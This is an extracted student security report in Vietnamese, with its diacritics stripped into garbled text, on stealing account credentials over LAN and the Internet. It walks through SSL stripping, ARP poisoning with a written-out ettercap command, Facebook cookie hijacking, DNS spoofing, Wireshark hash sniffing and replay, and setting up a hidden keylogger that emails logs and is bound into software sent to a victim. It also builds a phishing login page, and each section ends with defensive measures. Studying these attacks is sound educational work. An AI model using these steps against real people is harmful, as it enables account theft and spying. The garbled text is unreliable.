Danh cap mat khau.pdf

An Ton V Bo Mt H Thng Thng Tin

Nhm 2 - K09406 - 2012

1

KHOA TIN HC QUN L

AN TON V BO MT H THNG THNG TIN

nh Cp Thng Tin Ti Khon Trong Mng LAN V INTERNET

Ging vin hng dn:

GV. Trng Hoi Phan

Sinh vin thc hin

1. Nguyn Mnh Lm_K094061155

2. L Th Kiu Oanh_K094061173

3. L Th Thu_K094061188

4. Nguyn Th Thy_K094061190

5. Th Thanh Trang_K094061202

TP H Ch Minh - 2012

1.1.1.1.1.1.1.1 K09406


Nhm 2 - K09406 - 2012

2

NHN XT CA GING VIN


Nhm 2 - K09406 - 2012

3

Mc Lc

A. GII THIU S LC .................................................................................................................... 4

B. LOCAL AREA NETWORK .............................................................................................................. 4

I. SSL Strip .......................................................................................................................................... 4

1. SSL Strip ....................................................................................................................................... 4

2. Cch thc hin .............................................................................................................................. 7

3. Nhn xt v cch phng chng .................................................................................................... 8

II. nh Cp Cookie, Cp Session ................................................................................................ 8

1. ARP v vic u c ARP ........................................................................................................... 9

2. Cp cookies v chim quyn iu khin session ................................................................... 10

3. Kt lun v cc bin php phng chng .................................................................................. 18

III. DNS Spoofing .............................................................................................................................. 18

1. DNS Spoofing .............................................................................................................................. 18

2. Cc bc thc hin .................................................................................................................... 20

3. Kt lun v cch phng chng .................................................................................................. 21

IV. Sniff Password Dng Wireshark .............................................................................................. 22

1. Wireshark ................................................................................................................................... 22

2. Cch thc hin ............................................................................................................................ 22

3. Kt lun v bin php phng chng ......................................................................................... 25

C. INTERNET NETWORK.................................................................................................................. 25

I. Ly Cp Thng Tin Ti Khon Yahoo, Gmail, Facebook Dng Keylogger ............................ 25

1. Keylogger .................................................................................................................................... 25

2. Cch thc hin ............................................................................................................................ 26

3. Kt lun cch phng chng .................................................................................................... 30

II. Dng Web La o ................................................................................................................... 30

1. Cch thc hin ............................................................................................................................ 30

2. Ng cnh v mc ch t c ............................................................................................... 32

3. Nhn xt v cch phng chng .................................................................................................. 32

D. DANH SCH NHM PHN CNG VIC ................................................................................ 32


Nhm 2 - K09406 - 2012

4

A. GII THIU S LC

Mng cc b(Local Area Network) dng kt ni cc my tnh vi nhau trong 1 khu vc.

Kt ni c thc hin thng qua mi trng truyn thng tc cao nh dy cp. Cc LAN

cng c th kt ni vi nhau thnh WAN. LAN thng bao gm mt my ch (server , host) cn

gi l my phc v. My ch thng l my c b x l (CPU) tc cao, b nh (RAM) v a

cng (HD) ln.

Internet l mt h thng thng tin ton cu c th c truy nhp cng cng gm cc mng

my tnh c lin kt vi nhau. H thng ny truyn thng tin theo kiu ni chuyn gi d liu

(packet switching) da trn mt giao thc lin mng c chun ha giao thc IP. H thng

ny bao gm hng ngn mng my tnh nh hn ca cc doanh nghip, ca cc vin nghin cu

v cc trng i hc, ca ngui dng c nhn, v cc chnh ph trn ton cu.

Sniffer l mt hnh thc nghe ln trn h thng mng, da trn nhng c im ca c ch

TCP/IP. N cng l mt k thut bo mt, c pht trin nhm gip cc nh qun tr mng

khai thc v kim tra d liu lu thng trn mng 1 cch hiu qu.

C 2 loi sniffer l: active sniffer v passive sniffer.

Qu trnh sniffer:

- Bc 1: Tin hnh u c ARP, s dng cc tool nh ettercap chy trn linux v cain &

abel chy trn windows.

- Bc 2: Sau khi u c ARP, my hacker tr thnh k dng gia, sniff cc gi tin c

trao i gia my nn nhn v gateway. Qua hacker c th bt cc gi tin cha thng

tin quan trng v d cc gi tin ng nhp vo cc website, email. Vi nhiu phng php,

hacker c th tin hnh sniff cookie, cp sessison, thc hin DNS spoofing a nn

nhn vo a ch gi mo.

B. LOCAL AREA NETWORK

I. SSL Strip

1. SSL Strip

SSL v HTTPS

Secure Socket Layers (SSL) hoc Transport Layer Security (TLS) di s thi hnh hin i hn ca n, l cc giao thc c thit k cung cp bo mt cho truyn thng mng bng phng php m ha. Giao thc ny d c kt hp vi cc giao thc khc nht cung cp mt thc thi an ton cho dch v m giao thc cung cp. Cc v d dn chng y gm c SMTPS, IMAPS v HTTPS. Mc tiu ti thng l to cc knh an ton trn cc mng khng an ton.

Trong phn ny, chng ti s tp trung gii thiu vo tn cng SSL trn HTTP, c bit n nh HTTPS, v n l trng hp s dng ph bin nht ca SSL. C th khng nhn ra nhng hu nh chc chn bn ang s dng HTTPS hng ngy. Cc dch v email ph bin nht v cc ng dng ngn hng trc tuyn


Nhm 2 - K09406 - 2012

5

u da vo HTTPS bo m truyn thng gia trnh duyt web ca bn v cc my ch ca h c m ha an ton. Nu khng s dng cng ngh ny th bt c ai vi mt b nh hi gi d liu trn mng cng u c th pht hin ra c username, password v bt c th g c n khc.

Qu trnh c s dng bi HTTPS bo m an ton d liu l xit cht cc trung tm c lin quan n vic phn phi cc chng ch gia my ch, my khch v hng th ba c tin cy. Ly mt v d v trng hp c mt ngi dng ang c gng kt ni n mt ti khon email ca Gmail. Qu trnh ny s gm c mt vi bc d nhn thy, cc bc ny c n gin ha trong hnh 1 bn di.

Hnh 1: Qu trnh truyn thng HTTPS

Qu trnh c phc tho trong hnh 1 khng phi l mt qu trnh chi tit, tuy nhin v c bn n s lm vic nh sau:

- Trnh duyt my khch kt ni n https://www.mail.google. trn cng 80 bng cch s dng HTTP

- My ch redirect phin bn HTTPS my khch ca site ny bng cch s dng HTTP code 302.

- My khch kt ni n https://www.mail.google.com trn cng 443. - My ch s cung cp mt chng ch cho my khch gm c ch k s ca

n. Chng ch ny c s dng thm nh s nhn dng ca site. - My khch s dng chng ch ny v thm nh chng ch ny vi danh

sch cc nh thm nh chng ch tin cy ca n. - Truyn thng m ha s xy ra sau .

Nu qu trnh hp l ha chng ch tht bi th iu c ngha rng cc website tht bi trong vic thm nh s nhn dng ca n. Ti im ny, ngi dng s thy xut hin mt li thm nh chng ch v h vn c th tip tc vi nhng ri ro c th, v rt c th s khng c s truyn thng thc s vi website m h ngh h cn truy cp n.


Nhm 2 - K09406 - 2012

6

Ph hy HTTPS

Qu trnh ny c xem l an ton cao cch y mt vi nm khi c mt tn cng cng b rng n c th chim quyn iu khin thnh cng qu trnh truyn thng. Qu trnh ny khng lin quan n bn thn vic ph hy (defeating) SSL, m ng hn l ph hy cu ni gia truyn thng khng m ha v m ha.

Moxie Marlinspike, mt chuyn gia nghin cu bo mt hng u cho rng trong hu ht cc trng hp, SSL cha bao gi b trc tip tn cng. Hu ht thi gian mt kt ni SSL c khi to thng qua HTTPS nn nguyn nhn c th l do ai redirect mt HTTPS thng qua mt m p tr HTTP 302 hoc h kch vo lin kt direct h n mt site HTTPS, chng hn nh nt ng nhp. tng y l rng nu bn tn cng mt phin giao dch t mt kt ni khng an ton n mt kt ni an ton, trong trng hp ny l t HTTP vo HTTPS, bn s tn cng cu ni v c th man-in-the-middle kt ni SSL trc khi n xut hin. thc hin hiu qu iu ny, Moxie to mt cng c SSLstrip, chng ta s s dng cng c ny di y.

Qu trnh thc hin kh n gin v gi nh li cc tn cng m chng ta nghin cu trong cc phn trc ca lot bi. N c phc tho nh trong hnh 2 bn di.

Hnh 2: Chim quyn iu khin truyn thng HTTPS

Qu trnh c phc tho trong hnh 2 lm vic nh sau:

- Lu lng gia my khch v my ch u tin s b chn - Khi bt gp mt HTTPS URL, sslstrip s thay th n bng mt lin kt

HTTP v s nh x nhng thay i ca n. - My tn cng s cung cp cc chng ch cho my ch web v gi mo

my khch.

- Lu lng c nhn tr li t website an ton v c cung cp tr li cho my khch.

Qu trnh lm vic kh tt, my ch c lin quan vn nhn lu lng SSL m khng h bit v s khc bit ny. Ch c mt s khc bit r rt trong tri nghim ngi dng l lu lng s khng c cm c HTTPS trong trnh duyt, v vy mt ngi dng c kinh nghim s c th thy l mt iu d thng.


Nhm 2 - K09406 - 2012

7

2. Cch thc hin

Bc 1: Tin hnh u c ARP

Bc 2: Cu hnh chuyn tip IP.

Bc 3: Cu hnh IPTables nh tuyn ng lu lng HTTP.


Nhm 2 - K09406 - 2012

8

Bc 4: Chy SSL strip.

Khi hon tt, bn s c th chim quyn iu khin bt c kt ni SSL no ang c thit lp. T y, bn c th khi chy tin ch nh hi d liu v thu thp mt khu, cc thng tin nhn dng c nhn khc nh s th tn dng,... t lu lng.

3. Nhn xt v cch phng chng

Nh c gii thiu trn, vic chim quyn iu khin SSL theo cch ny l hu nh khng th pht hin t pha trnh ch v my ch c tng n vn truyn thng bnh thng vi my khch. N khng h c tng rng ang truyn thng vi mt client bi proxy. Vic nng cp trnh duyt cng kh quan trng. Khuyn co nn s dng cc trnh duyt khc Internet explorer.

II. nh Cp Cookie, Cp Session


Nhm 2 - K09406 - 2012

9

1. ARP v vic u c ARP

u tin hiu r hn v qu trnh nh cp cookies bng BackTrack4,

chng ta cn tm hiu mt cht v ARP v vic u c ARP. Vy ARP l g?

Trn thc t, cc card mng (NIC) ch c th kt ni vi nhau theo a ch

MAC, a ch c nh v duy nht ca phn cng. Do vy ta phi c mt c ch

chuyn i cc dng a ch ny qua li vi nhau. T ta c giao thc phn gii

a ch: Address Resolution Protocol (ARP).

Vy ARP hot ng trong mng Lan nh th no? Hiu r c ch hot ng

ca Arp s gip chng ta d dng hiu v vic th no l u c ARP. Khi mt

thit b mng mun bit a ch MAC ca mt thit b no m n bit a ch

tng network, n s gi mt ARP request bao gm a ch MAC ca n v a

ch IP ca thit b m n cn bit a ch MAC. Mi mt thit b nhn c request

ny s so snh a ch IP trong request vi a ch tng network ca mnh. Nu

trng a ch th thit b phi gi ngc li cho thit b gi ARP request mt gi

tin (trong c cha a ch MAC ca mnh).

Vic gi mo bng ARP chnh l li dng bn tnh khng an ton ca giao

thc ARP. Khng ging nh cc giao thc khc, chng hn nh DNS (c th c

cu hnh ch chp nhn cc nng cp ng kh an ton), cc thit b s dng

giao thc phn gii a ch (ARP) s chp nhn nng cp bt c lc no. iu ny

c ngha rng bt c thit b no c th gi gi ARP reply n mt my tnh khc

v my tnh ny s cp nht vo bng ARP cache ca n ngay gi tr mi ny. Vic

gi mt gi ARP reply khi khng c request no c to ra c gi l vic gi

ARP c. Khi cc ARP reply c ny n c cc my tnh gi request,

my tnh request ny s ngh rng chnh l i tng mnh ang tm kim

truyn thng, tuy nhin thc cht nn nhn li ang truyn thng vi mt k tn

cng.


Nhm 2 - K09406 - 2012

10

2. Cp cookies v chim quyn iu khin session

Thut ng chim quyn iu khin session (session hijacking) cha ng

mt lot cc tn cng khc nhau. Nhn chung, cc tn cng c lin quan n s

khai thc session gia cc thit b u c coi l chim quyn iu khin session.

Khi tr thnh k ng gia (Man in the midle), hacker c th bt cc gi tin

lu thng trn card mng ca nn nhn, qua Hacker c th phn tch v tm

c cookie, cp session ca nn nhn, s dng ti khon trc tuyn ca nn

nhn m khng cn thng qua chng thc username/password.

Trn thc t, khng c th g i qua mng c an ton, v d liu session

cng khng c g khc bit. Nguyn l n sau hu ht cc hnh thc chim quyn

iu khin session l nu c th chn phn no dung thit lp mt session,

khi hacker c th s dng d liu th vai mt trong s nhng thnh phn

c lin quan trong truyn thng v t c th truy cp cc thng tin session.

hiu r v vn cp cookies v chim quyn iu khin session,

nhm thit lp mt kch bn nn nhn ng nhp vo facebook v hacker s tin

hnh cp cookies ca nn nhn v dng n vo facebook ca nn nhn m

khng cn username v password.

Trong kch bn v d m a ra, nhm s thc hin mt tn cng chim

quyn iu khin session bng cch chn s truyn thng ca mt ngi dng ang

ng nhp vo ti khon Facebook ca anh ta. V li dng s truyn thng b chn

ny, nhm s ng vai ngi dng v truy cp vo ti khon t my tnh ang

dng tn cng. thc hin v tn cng, nhm s dng Back Track 4.

u tin t my ca nn nhn, nn nhn ng nhp vo facebook

Trang giao din Home ca ti khon nn nhn


Nhm 2 - K09406 - 2012

11

Cc thng s Netword ca my nn nhn

Bc 1: My tnh dng tn cng khi ng Back Track 4, v vo phn Konsole

( vung trong hnh) tin hnh vic u tin l u c ARP

Bc 2: Trong ca s Konsole, g dng lnh ettercap T p M arp

/192.168.1.100/ /192.168.1.1/ -i eth0 ( eth0 v ang s dng mng c dy) trong

192.168.1.100 l IP Adress ca my nn nhn v 192.168.1.1 l Default Gateway

ca my nn nhn


Nhm 2 - K09406 - 2012

12

Sau khi g dng lnh v nhn enter, Back Track 4 s thng bo u c ARP

thnh cng v cc thng bo v vic nn nhn ng nhp facebook c hin th


Nhm 2 - K09406 - 2012

13

Bc 3: Sau khi u c ARP, nhm tin hnh capture lu lng v phn tch cc

gi d liu ny, v ARP b u c nn cc gi d liu s c bo m capture

ng.

Khi ng Wireshark trong BackTrack 4

Giao din chnh ca Wirsshack hin ra, nhm chn eth0 v ang s dng mng c

dy


Nhm 2 - K09406 - 2012

14

Sau khi chn, Wireshark s bt u tin hnh capture cc gi d liu t my tnh

nn nhn

Sau khi Wireshark capture xong, v nhm ang tin hnh nh cp cookies

nn s ch quan tm ti nhng gi lin quan cookies ca nn nhn, nn nhm s lc

ra nhng gi lin quan n cookies ca nn nhn


Nhm 2 - K09406 - 2012

15

Bc 4: T nhng gi c lc ra, nhm tm kim gi thng tin no c cha

cookies lin quan ti vic nn nhn ng nhp Facebook tin hnh nh cp n

Sau

khi tm ra gi cha cookies ca nn nhn, nhm tin hnh nh cp cookies

Nhng thng tin v cookies ca nn nhn c nhm ly ra, nhng nhm ch quan

tm ti c_user v xs


Nhm 2 - K09406 - 2012

16

Bc 5: T nhng thng tin v cookies ca nn nhn m nhm cp c, nhm

to cookie c_user v xs cho trnh duyt, lm vic ny, nhm dng trnh duyt

Firefox v Add On Cookies Manager+


Nhm 2 - K09406 - 2012

17

Trong giao din Add Cookies, nhm tin hnh add hai cookie c_user v xs

Bc 6: Hon tt, nhm tin hnh cp cookies xong, cui cng nhm m trnh

duyt ln v g vo thanh a ch facebook.com, trnh duyt s a ti facebook

ca nn nhn


Nhm 2 - K09406 - 2012

18

3. Kt lun v cc bin php phng chng

Bng phng php nh cp cookie, hacker c th thm nhp vo ti khon

ca nn nhn, gi mo nn nhn phc v cho ca mnh, ch yu l la o.

Tuy nhin khng th chim c ti khon ca victim v khng bit password. Ch

cn user ch ng out ra, ngay lp tc cookie b xa => hacker d bt c nhng

khng th s dng v cookie ny ht hiu lc.

Ngoi ra c mt s bin php phng trnh nhng yu t nguy c:

Truy cp ti nh: C hi ai c th chn lu lng ca bn trn mng

gia nh t hn nhiu so vi mng ni lm vic. iu ny khng phi v my tnh

nh ca bn thng an ton hn, m vn l bn ch c mt hoc hai my tnh

ti nh. Trn mng LAN ni khc (v d ni bn lm vic), bn khng bit nhng

g ang din ra bn di tin snh hoc trong vn phng chi nhnh cch 200

dm, v vy ngun tn cng tim n l rt nhiu. Cn bit rng mt trong nhng

mc tiu ln nht ca tn cng chim quyn iu khin session l ti khon ngn

hng trc tuyn, tuy nhin ngoi ra n cn c p dng cho mi th.

Cn c s hiu bit v tn cng: Nhng k tn cng tinh vi, k c n cc

hacker dy dn nht cng vn c th mc li v li du vt tn cng bn.

Vic bit thi im no bn b ng nhp vo cc dch v da trn session c th

gip bn xc nh c rng liu c ai ang rnh rp mnh hay khng. Do

nhim v ca bn l cn phi canh chng mi th, quan tm n thi gian ng

nhp gn nht bo m mi th vn din ra tt p.

Bo mt tt cho cc my tnh bn trong: Cc tn cng ny thng c

thc thi t bn trong mng. Do nu cc thit b mng ca bn an ton th c hi

cho k tn cng tha hip c cc host bn trong mng ca bn s t i, v t

gim c nguy c tn cng chim quyn iu khin session.

III. DNS Spoofing

1. DNS Spoofing


Nhm 2 - K09406 - 2012

19

Gi mo DNS

Gi mo DNS l mt k thut MITM c s dng nhm cung cp thng tin

DNS sai cho mt host khi ngi dng duyt n mt a ch no , v

d, www.yahoo.com c IP XXX.XX.XX.XX, th c gng ny s c gi n mt

a ch www.24h.com.vn gi mo c tr a ch IP YYY.YY.YY.YY, y l a

ch m k tn cng to trc nh cp cc thng tin ti khon ngn hng trc

tuyn t ngi dng.

Truyn thng DNS

Giao thc Domain Naming System (DNS) nh c nh ngha trong RFC

1034/1035 c th c xem nh l mt trong nhng giao thc quan trng nht

c s dng trong Internet. Ni ngn ngn d hiu, bt c khi no bn nh

mt a ch web chng hn nh http://www.google.com vo trnh duyt, yu cu

DNS s c a n my ch DNS tm ra a ch IP tng xng vi tn min

m bn va nhp. Cc router v cc thit b kt ni Internet s khng hiu

google.com l g, chng ch hiu cc a ch chng hn nh 74.125.95.103.

My ch DSN lm vic bng cch lu mt c s d liu cc entry (c gi

l bn ghi ti nguyn) a ch IP bn ha tn DNS, truyn thng cc bn ghi

ti nguyn n my khch v n my ch DNS khc. Kin trc my ch DNS

trong ton doanh nghip v Internet l mt th kh phc tp. Nh mt vn ca

thc t, bn c th hnh dung chng nh cc quyn s chuyn dng cho kin trc

DNS. Chng ti s khng i vo gii thiu cc kha cnh v kin trc hay thm ch

cc kiu lu lng DNS khc nhau, m ch gii thiu mt phin giao dch DNS c

bn.

Hnh 1: Truy vn v p tr DNS

DNS hot ng theo hnh thc truy vn v p tr (query/response). Mt

my khch cn phn gii DNS cho mt a ch IP no s gi i mt truy vn n

my ch DNS, my ch DNS ny s gi thng tin c yu cu trong gi p tr

ca n. ng trn phi cnh my khch, ch c hai gi xut hin lc ny l truy

vn v p tr.

Kch bn ny s c i cht phc tp khi xem xt n s hi quy DNS. Nh

c cu trc th bc DNS ca Internet, cc my ch DNS cn c kh nng truyn

thng vi nhau a ra cu tr li cho cc truy vn c trnh bi my khch.

Nu tt c u din ra thun li nh mong i, my ch DNS bn trong ca chng

ta s bit tn bn ha a ch IP cho my ch bn trong mng ni b, tuy

nhin khng th mong i n bit a ch tng quan gia Google hoc Dell. y

l ni s quy ng vai tr quan trng. S quy din ra khi mt my ch DNS


Nhm 2 - K09406 - 2012

20

truy vn my ch DNS khc vi t cch my khch to yu cu. V bn cht, cch

thc ny s bin mt my ch DNS thnh mt my khch 2. Cc bc thc hin

Bc 1: M file etter.dns

Bc 2: Tr dns ca tn min v ip no

Bc 3: u c arp ca victim v dng plug-in dns_spoof

Bc 4: Khi victim truy cp cc tn min sa bc 2 ta nhn c thng bo


Nhm 2 - K09406 - 2012

21

Bc 5: chy trang www.yahoo.com xem kt qu gi mo DNS Spoofing

3. Kt lun v cch phng chng

Kh kh phng chng vic gi mo DNS v c kh t cc du hiu tn cng.

Thng thng, bn khng h bit DNS ca mnh b gi mo cho ti khi iu xy

ra, y l mt phng php tn cng cc k nguy him. Bin php phng chng:

- Bo v cc my tnh bn trong ca bn: Cc tn cng ging nh trn thng c thc thi t bn trong mng ca bn. Nu cc thit b mng ca an ton th s bn s gim c kh nng cc host b tha hip v c s dng khi chy tn cng gi mo.

- Khng da vo DNS cho cc h thng bo mt: Trn cc h thng an ton v c nhy cm cao, khng duyt Internet trn n l cch thc hin tt nht khng s dng n DNS. Nu bn c phn mm s dng hostname thc hin mt s cng vic ca n th chng cn phi c iu chnh nhng g cn thit trong file cu hnh thit b.

- S dng IDS: Mt h thng pht hin xm nhp, khi c t v trin khai ng, c th vch mt cc hnh thc gi mo ARP cache v gi mo DNS.


Nhm 2 - K09406 - 2012

22

- S dng DNSSEC: DNSSEC l mt gii php thay th mi cho DNS, s dng cc bn ghi DNS c ch k bo m s hp l ha ca p tr truy vn. Tuy DNSSEC vn cha c trin khi rng ri nhng n c chp thun l tng lai ca DNS.

IV. Sniff Password Dng Wireshark

1. Wireshark

L cng c dng phn tch cc giao thc ca mng cho php xem chi tit cc giao thc mng hin c, bt cc gi tin v phn tch offline chng, phn tch VoIP.

C th c/ghi nhiu dng file nh tcpdump (libpcap), Catapult DCT2000,

Cisco Secure IDS iplog, Microsoft Network Monitor, Network General Sniffer,

D liu nn dng gzip bt c c th gii nn ngay lp tc, cung cp nhiu

phng thc gii nn nh IPsec, ISAKMP, Kerberos, SNMPv3, SSL/TLS, WEP,

Lm vic vi nhiu loi kt ni mng, bao gm Ethernet, IEEE 802.11,

PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, FDDI,

Hacker sniff c gi tin v bt c usernam/password truy cp vo cc din n

vi chui mt khu b m ha md5, hacker tin hnh d password v tm ra kt

qu

Quy trnh m ha v chng thc: Bc 1: client chy hm md5 m ha password vit bng javascript ri gi ln

server bng phng thc POST hoc GET.

Bc 2: Server nhn chui m ha v tin hnh d vi database.

Bc 3: Server thng bo thnh cng. User log in.

2. Cch thc hin

Bc 1: u c ARP, c ch: xy dng ARP table, my tnh s gi cc ARP request, sau nhn li cc ARP reply. H thng hon ton khng c c ch


Nhm 2 - K09406 - 2012

23

xc minh xem thng tin ca ARP reply l tht hay gi, thng tin ny s c lu li vo ARP table s dng. Li dng im yu ny ngi tn cng s thc hin u c h thng ARP bng cch gi mt p ng ARP khng yu cu n host mc tiu. Mt p ng ARP gi s cha a ch phn cng ca thit b bnh thng v a ch IP ca thit b c xu

Bc 2: Chy wireshark tin hnh bt gi tin ng nhp vo din n vn-

zoom.com.


Nhm 2 - K09406 - 2012

24

Bc 3: Sau khi c username v chui m ha md5, hacker tin hnh save page

ng nhp ca din n v chnh sa cc value, sau gi username v chui m

ha password.


Nhm 2 - K09406 - 2012

25

3. Kt lun v bin php phng chng

Dng lnh:

- ipconfig /all xem MAC ca mnh

- arp -a xem bng ARP trn my mnh, kim tra MAC ca B c phi ng l

MAC B hay khng.

- arp -d * xa ton b ARP table trn my mnh, nh vy cc a ch MAC b

tn cng cng mt, v my tnh s bt u hc li. Nhng nu my tn cng

vn tip tc bm cc gi tin ARP u c th vic xa ARP table ny cng v

ch

- arp -s gn c nh IP ch vo MAC tht ca n, nh vy k tn cng khng

u c c IP ny na. Nhng vic ny khng kh thi cho mng ln, nhiu

my tnh, v c s thay i IP (v d dng DHCP).

Dng phn mm :

Chng ta c th ci t phn mm Anti ARP trnh vic nhn ARP Reply

gi mo

D ng thit :

Dynamic ARP Inspection : Switch s da vo bng DHCP Snooping

Binding kim tra gi tin ARP Reply c gi ra xem c hp l hay khng, nu

khng hp l s DROP ngay

C. INTERNET NETWORK

I. Ly Cp Thng Tin Ti Khon Yahoo, Gmail, Facebook Dng Keylogger

1. Keylogger

Keylogger l mt chng trnh my tnh nhm mc ch theo di v ghi li

mi thao tc thc hin trn bn phm vo mt tp tin nht k (log) cho ngi ci

t n s dng. V chc nng mang tnh vi phm vo ring t ca ngi khc ny


Nhm 2 - K09406 - 2012

26

nn cc trnh keylogger c xp vo cc phn mm gin ip. Keylogger nh gn,

s dng t b nh nn kh pht hin.

Ci keylogger ln my nn nhn hoc c th gi cho nn nhn mt file no

nh km keylog, t keylog s gi ti khon v password ca nn nhn v

mail ca hacker.

V sau, khi keylogger pht trin cao hn n khng nhng ghi li thao tc bn

phm m cn ghi li c cc hnh nh hin th trn mn hnh bng cch chp (screen-

shot) hoc quay phim (screen-capture) thm ch cn ghi nhn cch con tr chut di

chuyn.

Keylogger gm 2 loi: keylogger phn cng v keylogger phn mm.

Mt keylogger thng gm 3 phn chnh:

- Chng trnh iu khin (Control program): iu phi hot ng, tinh chnh cc thit lp, xem cc tp tin nht k. Thng thng ch c th gi bng t hp phm tt.

- Cch thc ci t vo my: Cc loi keylogger thng thng khi ci t vo

my cng ging nh mi chng trnh my tnh khc, u phi qua bc

ci t. Loi keylogger nguy him nht c th vo thng my ca ngi

dng b qua bc ci t, dng tnh nng autorun cng chy vi h

thng. Mt s loi t th (drop) mnh vo cc chng trnh khc, khi

ngi dng s dng cc chng trnh ny keylogger s t ng chy theo.

- Cch hot ng: Hook file hay monitor program ca keylogger theo di n

s ghi nhn v dch li cc tnh hiu ghi vo tp tin nht k. ng thi n

cn c th theo di c mn hnh v thao tc chut.

2. Cch thc hin

Bc 1: Click chut phi chn Option Ci t Keylogger.


Nhm 2 - K09406 - 2012

27

Bc 2:

Run on windows startup v Don't show program icon at startup, 2 ci

ny c cng dng l khi windows khi ng th n cng t ng chy vi ch n ti Show / hide program icon l ch phm tt.

remove the program from uninstation list, ci ny dng n keylog trong trnh ng dng g b cc chng trnh ci t c sn trong windows cng nh cc trnh ng dng tng t khc


Nhm 2 - K09406 - 2012

28

Bc 3: mc Logging cng nh du ht... ri nhn vo Password t m cho

con trojan.. mnh tin qun l

Bc 4: Ti Make screen capture screenhot every cc pro chn s pht m chng trnh t ng chp cnh mn hnh 1 pht hoc vi pht hoc c th lu hn Picture Quality l cht lng ca nh... cng cao th cng nng.

Bc 5: mc Email


Nhm 2 - K09406 - 2012

29


Nhm 2 - K09406 - 2012

30

Sau khi ci t thnh cng th ghp keylogger vo phn mm gi cho victim ci t. V vo mail thit lp kim tra cc file log v capture-screen m keylogger ghi nhn trn my victim.

3. Kt lun cch phng chng

S dng key logger l phng php rt hiu qu lu li din bin lm vic trn mn hnh v bn phm ca my nn nhn. Qua bt c hot ng ca nn nhn, cc thng tin v user, password. y l phng php tn cng hiu qu, tuy nhin, s pht trin ca cc chng trnh dit virus, security hn ch s pht tn v s dng cc loi key logger thng thng. V vy phng php phng chng xut nh sau:

- Hn ch s dng dng chung my tnh, ci t mt khu bo v cho my tnh.

- Khng m cc tp tin l khng r ngun gc, ch cc file c phn m rng: exe, com, bat, scr, swf, zip, rar

- Khng vo cc trang web l,

- Khng click cc ng link l.

- Khng ci cc phn mm l.

- Khng download chng trnh t cc ngun khng tin cy.

- Ci cc phn mm chng virus, spyware, trojanm tng la khi duyt web.

- Cp nht thng xuyn cc bn v cho h iu hnh v cc chng trnh phng chng.

II. Dng Web La o

1. Cch thc hin


Nhm 2 - K09406 - 2012

31

Dng mt trang web la o ging giao din ng nhp ca trang cn ly ti

khon. Sau tm mt tn min gn ging vi tn min ca trang web mun la o,

vd: yahooo.com, gmail.server.com, Ta chnh sa mt s on code trong trang ng

nhp sau up ln mt web server no v tr tn min v web server . Gi link

cho nn nhn hoc lm cch no la nn nhn vo link gi.

Cch thc hin

Bc 1: Chnh sa li trang ng nhp, cho action v trang xuly.php

Bc 2: To trang xuly.php

Bc 3: To file connect.php nh sau: $hostname l tn min ca web server.

Bc 4: to database tn yahoo c 1 bng password gm 2 ct: Passwd v User

Bc 5: Up ln webserver v th nghim.


Nhm 2 - K09406 - 2012

32

Kt qu:

2. Ng cnh v mc ch t c

Vic gi mo trang ng nhp ch thc hin c khi nn nhn vo trang la o

m ta dng sn, vic ny kh thc hin nu nn nhn tn min ca trang web.

Vic dng mt trang web la o c th ly c thng tin ca nn nhn. T c th

truy cp cc ti khon v s rt nguy him nu l ti khon ngn hng.

3. Nhn xt v cch phng chng

Vic lm web gi mo rt d thc hin ng thi cng rt d pht hin. Ch cn

ch khi ta ng nhp c th trnh c vic b mt ti khon.

Cn ci t antivirus, khng click vo cc ng link l trnh vic nhim

keylogger.

D. DANH SCH NHM PHN CNG VIC


Nhm 2 - K09406 - 2012

33

H V Tn MSSV a Ch Mail Nhim V

Nguyn Mnh Lm

K094061155

[email protected]

nh cp cookie - cp session

L Th Kiu Oanh

K094061173

[email protected]

Sniff password

dng wireshark

L Th Thu

K094061188

[email protected]

Keylogger

Trang web o

Nguyn Th Thy

K094061190

[email protected]

SSL strip

Th Thanh Trang

K094061202

[email protected]

DNS spoofing

HT


Nhm 2 - K09406 - 2012

34

Documents

Danh cap mat khau.pdf